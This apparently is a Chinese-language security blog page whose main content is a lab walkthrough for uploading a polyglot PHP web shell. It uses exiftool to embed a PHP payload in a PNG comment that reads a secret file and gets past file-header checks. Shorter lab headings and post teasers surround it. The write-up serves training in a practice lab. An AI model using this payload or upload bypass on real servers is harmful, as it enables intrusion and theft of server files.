之前介紹了 Windows 中取得檔案 hash 值的方式。在這邊列出幾個 Linux 上取得 hash 值的指令。

VS Code是一個相當好用的軟體，除了提供開發的功能外，他的 extension 更可以讓 VS Code 的使用範圍擴大，在資安工作上也相同的幫助。以下整理了幾個常用的extension。

在執行資安工作時，不論是事件、惡意程式分析或滲透，都會需要獨立的線路。尤其是在家工作時，相較牽新的線路，使用 4G 網路會是很好的選擇，而**無框行動 Circles.Life** 的方案相當值得推薦。搭配 4G LTE 無線路由器可快速建立獨立線路。

Lab: Remote code execution via polyglot web shell upload

Lab 目標

• 跟上一個lab相同，利用上傳漏洞將目標主機上/home/carlos/secret檔案內容輸出，再將輸出的內容subsmit。
• 此 lab 會檢查檔案 header 因此需產生 polyglot web shell 來上傳。

步驟

• 如同之前的 lab 先找到上傳後可被存取的路徑。
• 因為此 lab 開始針對檔案 header 進行檢查，因此會發現之前幾個 lab 的手法無法使用。
• 需要將 payload 加到圖片檔中來執行。
• 下面指令使用 exiftool 來將 payload 加入圖片 exif 的 comment 中，並產生一個附檔名為 php 的圖片檔。kali 預設沒有安裝 exiftool，執行sudo apt install libimage-exiftool-perl來安裝。

exiftool -Comment="<?php echo ' FLAG_START ' . file_get_contents('/home/carlos/secret') . ' FLAG_END '; ?>" <image_file>.png -o payload.php 

• 因為單純將 flag 顯示出來，會跟其他圖片檔亂碼接在一起，容易搞混，在前後分別加上 FLAG_START 、 FLAG_END加以區別。
• 將產生的payload.php上傳後，存取/files/avatars/payload.php即可取得此Lab的Flag。

補充說明

在執行 php 檔時，會從<?開始到?>結束，因此將 php code 內容放在 png 的 comment 中，再存成 .php 檔，會把其他內容當成亂碼，但執行放在 comment 的 php code。

Lab: Web shell upload via obfuscated file extension

Lab 目標

跟上一個lab相同，利用上傳漏洞將目標主機上/home/carlos/secret檔案內容輸出，再將輸出的內容subsmit。

Lab: Web shell upload via extension blacklist bypass

Lab 目標

跟上一個lab相同，利用上傳漏洞將目標主機上/home/carlos/secret檔案內容輸出，再將輸出的內容subsmit。